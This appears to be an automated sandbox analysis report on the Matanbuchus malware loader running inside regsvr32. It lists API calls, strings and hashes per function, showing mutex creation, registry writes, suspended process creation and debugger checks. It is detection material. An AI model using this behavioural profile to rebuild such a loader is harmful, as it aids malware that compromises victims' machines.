                                                • String ID: y='$*$8$AzureAD-SecureConv$E$TMP$WinHttpReadData$ntdll
                                                • API String ID: 0-3123300459
                                                • Opcode ID: 93693ac33872e20d6e6aae6f88c37403df7174ad3264901373af2da4a8a47893
                                                • Instruction ID: fe5200ab841c6c4208472d8e7e0dc21775046d21c0c794e21d4f5662a143e9d1
                                                • Opcode Fuzzy Hash: 93693ac33872e20d6e6aae6f88c37403df7174ad3264901373af2da4a8a47893
                                                • Instruction Fuzzy Hash: D19209B5D04268CFDF24CF6AC890BADBBB1BB4A304F1081DAD549A7344D7389A95CF64

                                                Control-flow Graph

                                                APIs
                                                • CreateMutexA.KERNEL32(00000000,00000001,?), ref: 7F6F7A47
                                                • GetLastError.KERNEL32 ref: 7F6F7B44
                                                • CloseHandle.KERNEL32(00000000,6FA9D62B,?,?,?), ref: 7F6F7CBA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateErrorHandleLastMutex
                                                • String ID: *$9mD$B$u${
                                                • API String ID: 4294037311-4130828584
                                                • Opcode ID: 09ff8ef81e6e8e8c66f5feced78eabec83dd7a2e974bbf0783686203c7c3842f
                                                • Instruction ID: 7223e23dfb67a1c3877c94f505288cc8bd343ceac11612d3bce15b7b51b613b4
                                                • Opcode Fuzzy Hash: 09ff8ef81e6e8e8c66f5feced78eabec83dd7a2e974bbf0783686203c7c3842f
                                                • Instruction Fuzzy Hash: D4F148B5D04359CFDB14CFAAC8907ADBBF1BF89310F28819AE459AB290D7345A81CF51

                                                Control-flow Graph

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 7F72CCEE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DirectorySystem
                                                • String ID: )$2$?$m$n $e
                                                • API String ID: 2188284642-1749247282
                                                • Opcode ID: c0179397094d49a87ccc5ad87c5fa6f06041135790d448f0b1617b9397da98b1
                                                • Instruction ID: d40cac8aec9b3e7d718e00f60b86deace173a9eb9f91bd136a48330f378b85a9
                                                • Opcode Fuzzy Hash: c0179397094d49a87ccc5ad87c5fa6f06041135790d448f0b1617b9397da98b1
                                                • Instruction Fuzzy Hash: 93F14475D04369CBCB29CF6AC8847ADBBF2BF89311F2481DAD049AB290D7741A94CF51

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ShellWindow
                                                • String ID: 2$MNo name attribute $Q$\$c
                                                • API String ID: 2831631499-3960561890
                                                • Opcode ID: ab7a08c9ac5d69647471b0c1efdf6d2a607bb1cf69890abc2e142fd7f24a7fa7
                                                • Instruction ID: 73bac12aa4ffa945121bd78f935f70760d48ce57a68153055ccd5704b9f17d86
                                                • Opcode Fuzzy Hash: ab7a08c9ac5d69647471b0c1efdf6d2a607bb1cf69890abc2e142fd7f24a7fa7
                                                • Instruction Fuzzy Hash: 7CA127B9D0435ACBDB18CFAAD48079DBBB1BF89310F28819ED448AB381D3745A95CF51

                                                Control-flow Graph

                                                APIs
                                                • GetProcessHeap.KERNEL32 ref: 7F71986F
                                                • GetDriveTypeA.KERNEL32(7F7581EC), ref: 7F719903
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DriveHeapProcessType
                                                • String ID: *
                                                • API String ID: 2912393814-163128923
                                                • Opcode ID: 978c35ae878add47e7110216d2533f6e6c262e51dd137e9c41e80e54dc008ab1
                                                • Instruction ID: 42479cddcadc3d94a2da73fa58d9d813de973dc9bf9de74b6beaeaaf4748ddda
                                                • Opcode Fuzzy Hash: 978c35ae878add47e7110216d2533f6e6c262e51dd137e9c41e80e54dc008ab1
                                                • Instruction Fuzzy Hash: 68A11679D0435ACBCB18CFAAD45079DBBB2BF89320F28859ED449AB340D7301A95CF51
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 7F731423
                                                • IsDebuggerPresent.KERNEL32 ref: 7F7314EF
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 7F731508
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 7F731512
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                • Opcode ID: 7404986f67b87d8183b629eaf230d30e4a244f3c876bcc6c5ada1d6bcb445d1b
                                                • Instruction ID: 70111a17ddfa13de2148e7b15a1f9fdfaa989b7387172d32a39b9687a54bee10
                                                • Opcode Fuzzy Hash: 7404986f67b87d8183b629eaf230d30e4a244f3c876bcc6c5ada1d6bcb445d1b
                                                • Instruction Fuzzy Hash: D731F279D0132D9ADB10DFA0C949BCDBBB8AF08310F1041EAE40DAB250EBB19B85CF45
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: @
                                                • API String ID: 3732870572-2766056989
                                                • Opcode ID: 5f4f48760db2e552bb39d169258d1ac138e117acb2fc7a97c82604e7304871c4
                                                • Instruction ID: 1abf9f1aaa08cef002fc90ffca226d1ecf0bac1eaac90f180b9795775237a2ac
                                                • Opcode Fuzzy Hash: 5f4f48760db2e552bb39d169258d1ac138e117acb2fc7a97c82604e7304871c4
                                                • Instruction Fuzzy Hash: 39718FB8E04259DFCB08CF98C590AEEFBB1BF88304F248199D915AB345D734AA45CF95

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: *$+$,$1$7$7$;$>$X$i$ivh$u$w
                                                • API String ID: 0-285284801
                                                • Opcode ID: 978e51d8fc97cfc66d47f6e7410a8f1de3f742cbc66ec9112ebcc7b19a6ab748
                                                • Instruction ID: 7e4ad85b5ea1e439c87671791a08c20124049b9b9d3b277b7612c44473d35cce
                                                • Opcode Fuzzy Hash: 978e51d8fc97cfc66d47f6e7410a8f1de3f742cbc66ec9112ebcc7b19a6ab748
                                                • Instruction Fuzzy Hash: EAB14374D04288DFEB01CFA8C885BDEBBF1AF48304F104159E549BB380DBB66A45CB61
                                                APIs
                                                Strings
                                                • d, xrefs: 7F6DC2E0
                                                • d, xrefs: 7F6DC445
                                                • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F6DC27E, 7F6DC424
                                                • x < 0 and x < (std::numeric_limits<number_integer_t>::max)(), xrefs: 7F6DC283
                                                • d, xrefs: 7F6DC39C
                                                • @, xrefs: 7F6DC40D
                                                • n_chars < number_buffer.size() - 1, xrefs: 7F6DC429
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aullrem
                                                • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$n_chars < number_buffer.size() - 1$x < 0 and x < (std::numeric_limits<number_integer_t>::max)()
                                                • API String ID: 3758378126-3644039597
                                                • Opcode ID: b0bc2c88ee3451f0f5d13f313ff5c6b73a64325284385726ea95191dc4875af1
                                                • Instruction ID: deda65bb9d8dc5d52e1947c24186eb3dc99bcd65110bd85be6e15107099feb6e
                                                • Opcode Fuzzy Hash: b0bc2c88ee3451f0f5d13f313ff5c6b73a64325284385726ea95191dc4875af1
                                                • Instruction Fuzzy Hash: C0F1BE74D0125DDFDF14CF99C990B9DBBB2BB88304F10819AE919A7394D7306A85CF94
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv__aullrem
                                                • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$false$n_chars < number_buffer.size() - 1
                                                • API String ID: 3839614884-178659603
                                                • Opcode ID: a9ae9cb20c831b20e1a51f73a32c306c4e1922d0c310c9d8414609ae057f2158
                                                • Instruction ID: 5e723144c4084196d7cc638bead58717731232e44b4e48079e7f8fc4a904a9e7
                                                • Opcode Fuzzy Hash: a9ae9cb20c831b20e1a51f73a32c306c4e1922d0c310c9d8414609ae057f2158
                                                • Instruction Fuzzy Hash: FDE1A174D05219DFDF14CF98C980B9DBBB2BF48304F2081AAE519AB394D7346A85CF94
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE,00000000,000F003F,?,00000044,00000000), ref: 7F72EF39
                                                • wsprintfW.USER32 ref: 7F72EF86
                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 7F72EFA3
                                                • RegSetValueExW.ADVAPI32(00000000,bbb,00000000,00000003,00000000,00000000), ref: 7F72EFC4
                                                • RegSetValueExW.ADVAPI32(00000000,kkk,00000000,00000003,?,0000000F), ref: 7F72EFE4
                                                • RegCloseKey.ADVAPI32(00000000), ref: 7F72EFFD
                                                • RegCloseKey.ADVAPI32(00000000), ref: 7F72F008
                                                  • Part of subcall function 7F72F6E7: GetTickCount.KERNEL32 ref: 7F72F705
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseValue$CountCreateOpenTickwsprintf
                                                • String ID: %s_%x%x$SOFTWARE$bbb$kkk
                                                • API String ID: 730945307-550109914
                                                • Opcode ID: 7c6e4b04da0cc1ba9f5a8e86eb216171d15ef24528084bfeab5b2942e2f4b1e5
                                                • Instruction ID: 1b384030f744f727ec2195a08e7fe7b96e5d9bb2eeae25d2d3b255b695d7d2fc
                                                • Opcode Fuzzy Hash: 7c6e4b04da0cc1ba9f5a8e86eb216171d15ef24528084bfeab5b2942e2f4b1e5
                                                • Instruction Fuzzy Hash: 54312972A0021DBADB219A95DC49FDFBBBDEF48361F100065F609EB050D731AB65DBA0
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?), ref: 7F72F149
                                                • IsWow64Process.KERNEL32(00000000), ref: 7F72F150
                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 7F72F18C
                                                • wsprintfW.USER32 ref: 7F72F21A
                                                • CloseHandle.KERNEL32(00000000), ref: 7F72F3A5
                                                • CloseHandle.KERNEL32(00000000), ref: 7F72F3B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CloseHandle$CreateCurrentWow64wsprintf
                                                • String ID: 0x%x$?
                                                • API String ID: 3386633596-4137330559
                                                • Opcode ID: 6231e5ea43c3660b47ea37c56dc1d9f20f4be4931a9b7bcb95cf7eb147276d32
                                                • Instruction ID: e8db8cad2bceb430e73dff5cc388d6c801a20cf46f54571731e0eac009475647
                                                • Opcode Fuzzy Hash: 6231e5ea43c3660b47ea37c56dc1d9f20f4be4931a9b7bcb95cf7eb147276d32
                                                • Instruction Fuzzy Hash: 92812EB2E0120CAFEF019BA4CE85EEEB7FDEF08245F140069E915E7151E735AE548B60
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 7F733C17
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 7F733C1F
                                                • _ValidateLocalCookies.LIBCMT ref: 7F733CA8
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 7F733CD3
                                                • _ValidateLocalCookies.LIBCMT ref: 7F733D28
                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 7F733D3E
                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 7F733D53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
                                                • String ID: csm
                                                • API String ID: 1385549066-1018135373
                                                • Opcode ID: a71759491f182caaa792ef1a3857cd1c94e92c827e762cf49e208ab2f1d9ef72
                                                • Instruction ID: 853840dfc44084e5588ea336be31dc1a11a97ac4cf625c2390f8202bf8303050
                                                • Opcode Fuzzy Hash: a71759491f182caaa792ef1a3857cd1c94e92c827e762cf49e208ab2f1d9ef72
                                                • Instruction Fuzzy Hash: 4E41EE34E00389BBCF11CF68C984A9EBBB5EF45224F908195EC259F292C735AA15DB91
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 6B63FEB7
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6B63FEBF
                                                • _ValidateLocalCookies.LIBCMT ref: 6B63FF48
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6B63FF73
                                                • _ValidateLocalCookies.LIBCMT ref: 6B63FFC8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2015907151.000000006B611000.00000020.00000001.01000000.00000008.sdmp, Offset: 6B610000, based on PE: true
                                                • Associated: 00000006.00000002.2015892942.000000006B610000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2015933627.000000006B64B000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2015950051.000000006B65A000.00000004.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2016092162.000000006BB07000.00000004.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2016108438.000000006BB08000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_6b610000_regsvr32.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm$csm
                                                • API String ID: 1170836740-3733052814
                                                • Opcode ID: 7252645f6cbf3536c847fea0a7ba65a5de0477f354f77bb3a72a03a5e03e4581
                                                • Instruction ID: efa62531fb50b942fb8e3c882940595e451f176c2a68382b6c29a892569711fb
                                                • Opcode Fuzzy Hash: 7252645f6cbf3536c847fea0a7ba65a5de0477f354f77bb3a72a03a5e03e4581
                                                • Instruction Fuzzy Hash: B951C5B4A006299FCF00DF68C840A9E7BB5FF46718F14C199E8199B3A2D73AD951CB91
                                                APIs
                                                • IsCharLowerA.USER32(00000073), ref: 7F72C78A
                                                • GetModuleFileNameW.KERNEL32(00000000,kernel32,00000000), ref: 7F72C7AA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CharFileLowerModuleName
                                                • String ID: 9mD$kernel32$u${
                                                • API String ID: 515556390-2230072418
                                                • Opcode ID: 3aa30b6687309bf164a76808b1d91ff0470156eb35b0acff8459001766dc6184
                                                • Instruction ID: 879545435365b80c3eebe473a95b9eef233a44547c2c3fd23729ca539402cb00
                                                • Opcode Fuzzy Hash: 3aa30b6687309bf164a76808b1d91ff0470156eb35b0acff8459001766dc6184
                                                • Instruction Fuzzy Hash: 2AB132B9D04359CEDB24CFAAC84079DBBF1BF98320F24819AD458AB391E7341A95CF51
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 6B634DE7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2015907151.000000006B611000.00000020.00000001.01000000.00000008.sdmp, Offset: 6B610000, based on PE: true
                                                • Associated: 00000006.00000002.2015892942.000000006B610000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2015933627.000000006B64B000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2015950051.000000006B65A000.00000004.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2016092162.000000006BB07000.00000004.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2016108438.000000006BB08000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_6b610000_regsvr32.jbxd
                                                Similarity
                                                • API ID: DirectorySystem
                                                • String ID: ($8$?2$GB$r
                                                • API String ID: 2188284642-435796455
                                                • Opcode ID: 9be49e0ea2ac8cfb546313509feb016989554b5bbf3bc19e7d1a146eec88d5e6
                                                • Instruction ID: f96a7984be759777e09c89e73fd855bcd911577cfba0c2f426cac3fef16bff03
                                                • Opcode Fuzzy Hash: 9be49e0ea2ac8cfb546313509feb016989554b5bbf3bc19e7d1a146eec88d5e6
                                                • Instruction Fuzzy Hash: C27138759042988FCF24CFAAC4806ADBFF1BB5A304F14819AE498A7395E7388655CF25
                                                APIs
                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 6B63D09A
                                                • Sleep.KERNEL32(00000064), ref: 6B63D0A7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2015907151.000000006B611000.00000020.00000001.01000000.00000008.sdmp, Offset: 6B610000, based on PE: true
                                                • Associated: 00000006.00000002.2015892942.000000006B610000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2015933627.000000006B64B000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2015950051.000000006B65A000.00000004.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2016092162.000000006BB07000.00000004.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2016108438.000000006BB08000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_6b610000_regsvr32.jbxd
                                                Similarity
                                                • API ID: DirectorySleepWindows
                                                • String ID: )$X$Z$t
                                                • API String ID: 1499897475-3436847989
                                                • Opcode ID: 1ac9e97676a06f7459a996af4f71db522573a8d2c248dadfa154baacd4979b29
                                                • Instruction ID: 5d002a31df826169504e805da7a0207f96811048080ca3dce6a30b1ef8fc773c
                                                • Opcode Fuzzy Hash: 1ac9e97676a06f7459a996af4f71db522573a8d2c248dadfa154baacd4979b29
                                                • Instruction Fuzzy Hash: 6A5100B5D04398CFDB24DFAAC88069DBBB1BF5A304F1081A9D558AB351E7348A95CF21
                                                APIs
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F723EFF
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F723F19
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F723F33
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F723F4D
                                                Strings
                                                • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F723F69
                                                • false, xrefs: 7F723F6E
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::bad_exception::bad_exception
                                                • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                                                • API String ID: 2160870905-4036550669
                                                • Opcode ID: 18669042092a78572b473a7a87ec27dbc87ec74ab42f6ef02c3cc0d5c503c541
                                                • Instruction ID: c665379888d1b8b3749c102d1d452cc8e5196be179b7d4c0c1e613cbe920eee4
                                                • Opcode Fuzzy Hash: 18669042092a78572b473a7a87ec27dbc87ec74ab42f6ef02c3cc0d5c503c541
                                                • Instruction Fuzzy Hash: 1C214B72A00248EBCB08CFA4C980DEEB7B5FF88700F54855DB9516B245DB31AA09DB55
                                                APIs
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F723DDF
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F723DF9
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F723E13
                                                • std::bad_exception::bad_exception.LIBCMTD ref: 7F723E2D
                                                Strings
                                                • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F723E49
                                                • false, xrefs: 7F723E4E
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::bad_exception::bad_exception
                                                • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                                                • API String ID: 2160870905-4036550669
                                                • Opcode ID: 1345e523274d92f314ec119e0bca6e92fbbac82797daabd1221d4d0093d997db
                                                • Instruction ID: 1056e7b07f519efbcbc1b73377bc921a92bbd51d83d9cfe31cfc5e1dd8b33665
                                                • Opcode Fuzzy Hash: 1345e523274d92f314ec119e0bca6e92fbbac82797daabd1221d4d0093d997db
                                                • Instruction Fuzzy Hash: A5214B72E00348EBCB04CFA4C980EEEB7B6FF88700F54856DA9516B245DB31AA19DB54
                                                APIs
                                                • FreeLibrary.KERNEL32(00000000,?,7F74413B,7F741108,0000000C,7F7552A0,00000000,00000000,?,7F744388,00000021,FlsSetValue,7F75D860,7F75D868,7F7552A0), ref: 7F7440EF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 3664257935-537541572
                                                • Opcode ID: cf0a46dfd94ffe3111029228cd971126dcdacb8a2778a6162b5e9cd617cab032
                                                • Instruction ID: 76289f4466d388af4b45affed76370099d029dd70a1a336caf74e1c373802aa2
                                                • Opcode Fuzzy Hash: cf0a46dfd94ffe3111029228cd971126dcdacb8a2778a6162b5e9cd617cab032
                                                • Instruction Fuzzy Hash: D6210B76905312EBCB129E758C45B6A3765EF41370B341161ED16AB290EB30FA35DAD0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2015907151.000000006B611000.00000020.00000001.01000000.00000008.sdmp, Offset: 6B610000, based on PE: true
                                                • Associated: 00000006.00000002.2015892942.000000006B610000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2015933627.000000006B64B000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2015950051.000000006B65A000.00000004.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2016092162.000000006BB07000.00000004.00000001.01000000.00000008.sdmp
                                                • Associated: 00000006.00000002.2016108438.000000006BB08000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_6b610000_regsvr32.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: ($8$?2$GB$r
                                                • API String ID: 3472027048-435796455
                                                • Opcode ID: c98f7b2a1639047d47767a7b6ab8504b5cf1f09046addeccbaadf76a8750e894
                                                • Instruction ID: e54985919a55979fce36e2f79d727d54cd6dfb3efc82b8535de1325e30d81d5a
                                                • Opcode Fuzzy Hash: c98f7b2a1639047d47767a7b6ab8504b5cf1f09046addeccbaadf76a8750e894
                                                • Instruction Fuzzy Hash: 6E914AB1D043ACDFDF20CFAAC4816ADBBB2BB0A314F14819AE058A7345D7399954CF65
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7F73F265
                                                • GetFileType.KERNEL32(00000000,?,00003C16), ref: 7F73F277
                                                • swprintf.LIBCMT ref: 7F73F298
                                                • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00003C16), ref: 7F73F2D5
                                                Strings
                                                • Assertion failed: %Ts, file %Ts, line %d, xrefs: 7F73F28D
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ConsoleFileHandleTypeWriteswprintf
                                                • String ID: Assertion failed: %Ts, file %Ts, line %d
                                                • API String ID: 2943507729-1719349581
                                                • Opcode ID: a8e41d74acfaec1ea5f96477c915619ecac2acb724a19f2a20a37a6eb7c2a50c
                                                • Instruction ID: 5b01b8be1526dcaa06a10993bc480f6a8a0414096992c2f260d3c8c6a80bb365
                                                • Opcode Fuzzy Hash: a8e41d74acfaec1ea5f96477c915619ecac2acb724a19f2a20a37a6eb7c2a50c
                                                • Instruction Fuzzy Hash: 2111E97BD00219BBCF149B29CD44ADE737CDF84360F90455AF926DB041DA30AD418754
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BDC47C31,7F7552A0,?,00000000,7F753C13,000000FF,?,7F74077A,7D83FC4D,?,7F74074E,7F7552A0), ref: 7F74081F
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 7F740831
                                                • FreeLibrary.KERNEL32(00000000,?,00000000,7F753C13,000000FF,?,7F74077A,7D83FC4D,?,7F74074E,7F7552A0), ref: 7F740853
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F6D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7f6d0000_regsvr32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 4e8870962a127675e501e422074c59658e397e5c8df141b103aa55ae4b459d3b
                                                • Instruction ID: 0fa1fda2dc6e96376a5325a911a37acbe219416602fd74368ab9c13a131ffdd0
                                                • Opcode Fuzzy Hash: 4e8870962a127675e501e422074c59658e397e5c8df141b103aa55ae4b459d3b
                                                • Instruction Fuzzy Hash: 7501673691461AAFDB018F51CC05BAE77B8FB84725F140626EC17AB690DB74A924CA90
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 7F6E5807
                                                • int.LIBCPMTD ref: 7F6E5820
                                                  • Part of subcall function 7F6EAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F6EAA36
